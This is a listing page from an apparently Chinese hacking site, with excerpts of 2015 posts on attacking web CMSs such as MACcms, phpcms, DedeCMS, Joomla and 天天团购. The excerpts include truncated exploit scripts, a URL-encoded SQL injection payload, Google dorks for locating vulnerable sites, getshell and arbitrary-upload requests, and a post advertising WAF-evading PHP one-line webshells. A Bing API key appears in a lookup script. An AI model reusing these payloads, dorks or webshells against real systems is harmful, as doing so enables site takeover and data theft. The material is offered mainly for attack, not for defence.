• MACcms通杀型后台拿shell

    MACcms通杀型后台拿shell
    90sec@Joseph 此漏洞的缘由是来自论坛的一哥们求助拿shell才无奈的去审计 看见这个模块编辑就总感觉有漏洞存在当然这里并没有想象的那么简单,咱们之前遇到的模版编辑漏洞已经在这个版本修复了 漏洞文件: elseif($method=='save') {     $path = be('post','path'); $path = str_replace('\\','/',$path);     $file =  be('post','file'); $file = str_replace('\\',...
    作者:unhonker| 发布:2015年9月17日 | 分类:漏洞公布 | 被撸:7,903次| 标签:
  • 旁注查询脚本(python)

    旁注查询脚本(python)
    # coding=utf-8 #author: 小续/Joseph       import urllib import urllib2 import base64 import re import sys #填写供可以使用的key AccountKey='OP8/b5S8imIbXfU1yOYpLbL7tcEgjJ/RJAJjJkTcrJo' top=1000 skip=0 format='json' def BingSearch(query):     payload={}     payload['$top']=top     payload['$skip']=skip     payload['$format']=...
    作者:unhonker| 发布:2015年8月22日 | 分类:技术文章 | 被撸:2,927次|
  • Meinestadt24注入漏洞

    Meinestadt24注入漏洞
    [-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]   Exploit Title : Meinestadt24 SQL Injection Vulnerability   Exploit Author : Ashiyane Digital Security Team   Google Dork One : intext:© 2015 meinestadt24 Google Dork Two : inurl:nachrichten.php?artikel_id=   Date : 2015-7-25   Tested On : Windows Se7en   [-...
    作者:unhonker| 发布:2015年7月27日 | 分类:漏洞公布 | 被撸:4,050次| 标签:
  • phpcms v9最新高危sql注入exp

    phpcms v9最新高危sql注入exp
    获取当前数据库 http://192.168.1.139:8080/phpcms/index.php?m=member&c=index&a=login post: forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%...
    作者:unhonker| 发布:2015年7月24日 | 分类:漏洞公布 | 被撸:13,799次| 标签:
  • dedecms远程代码执行利用脚本

    dedecms远程代码执行利用脚本
    转自90sec@Joseph #! /usr/bin/env python #coding=utf-8 #Joseph(小续)   import requests import sys import re def main():     try:         url="http://"+sys.argv[1].strip('http://')     except IndexError:         print '''         poc: dede.py [url]http://www.baidu.com/[/url]         '''     payload="/install/index.ph...
    作者:unhonker| 发布:2015年7月23日 | 分类:漏洞公布 | 被撸:4,866次| 标签:
  • PHPCMS用户登陆SQL注入漏洞分析

    PHPCMS用户登陆SQL注入漏洞分析
    文章为转载。 0x00 简述 之前manning在调漏洞的时候,突然发现正常登陆不上去了,当时帮忙跟了下phpcms的登陆流程。之后感觉这个流程貌似有些问题,就仔细看了下,没想到真是一个0day~~ 0x01 漏洞原理 我们先直接看这个漏洞最根源的地方,phpsso/index.php文件所有的操作都存在严重的注入问题,这个类文件的构造函数最先调用它的父构造函数,通过auth_key来解析POST传入的da...
    作者:unhonker| 发布:2015年7月22日 | 分类:技术文章, 漏洞公布 | 被撸:5,092次| 标签:
  • 过狗过盾无特征无动态函数PHP一句话

    过狗过盾无特征无动态函数PHP一句话
    转自90sec@phithon 分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等) 原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html 所有一句话使用方法基本都是: http:// target/shell.php?e=assert 密码pass 分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦...
    作者:unhonker| 发布:2015年7月20日 | 分类:技术文章 | 被撸:3,286次| 标签:
  • 天天团购getshell

    天天团购getshell
    转载自90sec@Joseph 首先跟踪到这个文件:modules\account.mod.php function Login_callback()         {                 $from = get('from', 'txt');//$_GET                 $uuid = account('ulogin')->verify($from);                 if ($uuid !== false)                 {                         if (meta($uuid))                         {      ...
    作者:unhonker| 发布:2015年7月20日 | 分类:漏洞公布 | 被撸:2,329次| 标签:
  • DedeCMS < 5.7-sp1远程文件包含漏洞

    DedeCMS < 5.7-sp1远程文件包含漏洞
    Published: 2015-06-29 Remote getshell Details: ======= After the default installation of dedecms Installation directory /install/index.php or /install/index.php.bak /install/index.php //run iis apache exploit /install/index.php.bak //run apache exploit Code analysis /install/index.php.bak?install_demo_name=aaaa&ins...
    作者:unhonker| 发布:2015年7月06日 | 分类:漏洞公布 | 被撸:7,600次| 标签:
  • Joomla SimpleImageUpload任意文件上传

    Joomla SimpleImageUpload任意文件上传
    # Exploit Title: Joomla Simple Image Upload - Arbitrary File Upload # Google Dork: inurl:option=com_simpleimageupload # Date: 23.06.2015 # Version: 1.0 # Tested on: MsWin32   # Vuln Same to Com_Media Vulnerability   # Live Request :   POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc HTTP...
    作者:unhonker| 发布:2015年6月26日 | 分类:漏洞公布 | 被撸:4,793次| 标签: